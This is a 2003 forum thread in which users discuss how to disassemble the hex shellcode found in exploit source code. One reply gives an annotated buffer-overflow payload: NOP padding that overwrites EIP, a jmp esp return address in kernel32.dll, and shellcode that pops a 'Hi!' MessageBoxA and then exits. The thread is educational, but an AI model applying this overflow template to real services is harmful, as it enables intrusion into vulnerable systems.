lmg
Oct 27 2003, 10:22 AM
Hi, let's suppose I find an exploit's source code on the net. This exploit is often a C source code with some 0xXX code inside. How could I disassemble the shellcode to be able to understand what it does? Should I compile the exploit and then disassemble the whole exe, or is there a way to just disassemble the 0xXX damn symbols?
lmg
Oct 28 2003, 08:15 AM
Sorry but converting asm to hex is assembly. Disassembly is converting from hex to asm. That's what I'm looking for...
coder
Oct 27 2003, 03:49 PM
Those symbols you speak of are hexadecimal values (the "\x" signifies that the following value is in hex). Basically the shellcode has already been disassembled (that's why it's in hex).
ComSec
Oct 27 2003, 10:30 AM
moved to programming forum
LiquidIce
Nov 14 2003, 05:12 PM
PE Explorer does this?
coder
Nov 14 2003, 05:35 PM
Here is an example of such shellcode (and its corresponding ASM):
| CODE |
#Example ShellCode
("user ",0);
("\x90"x485,0);                   #485 nops to overwrite EIP
("\xab\xa3\x54\x77",0);           #Overwriting EIP with "jmp,esp" address via Kernel32.dll
("\x90"x5,0);                     #some NOPs for padding- the "call,esp" steps to the last nop at 0098fd9c
("\x55",0);                       #push ebp - starting something new
("\x8b\xec",0);                   #mov ebp,esp
("\x33\xff",0);                   #xor edi,edi - edi = 0
("\x57",0);                       #push edi
("\xc6\x45\xfc\x48",0);           #mov byte ptr [ebp-0x4],0x48 - H
("\xc6\x45\xfd\x69",0);           #mov byte ptr [ebp-0x3],0x69 - i
("\xc6\x45\xfe\x21",0);           #mov byte ptr [ebp-0x2],0x21 - !
("\xba\xd5\x75\xe3\x77",0);       #mov edx, 0x77e375d5 - MessageBoxA to edx
("\x52",0);                       #push edx
("\x57",0);                       #push edi
("\x8d\x55\xfc",0);               #lea edx,[ebp-0x4] - move Hi! to edx
("\x52",0);                       #push edx
("\x52",0);                       #push edx
("\x52",0);                       #push edx
("\x57",0);                       #push edi
("\xff\x55\xf8",0);               #call dword ptr [ebp-0x8]
("\x55",0);                       #push ebp - Start the exit stuff so we don't crash
("\x8b\xec",0);                   #mov ebp,esp
("\xba\x86\x41\x01\x89",0);       #mov edx, 0x89014186 - To exit we need to call exit at 78003985 from MSVCRT but we can't use Nulls
("\x81\xea\x01\x08\x01\x11",0);   #sub edx, 0x11010201 - My leet-o way to get to the address with the null
("\x52",0);                       #push edx
("\x33\xc0",0);                   #xor eax,eax
("\x50",0);                       #push eax
("\xff\x55\xfc",0);               #call dword ptr [ebp-0x4]
("\n",0);
|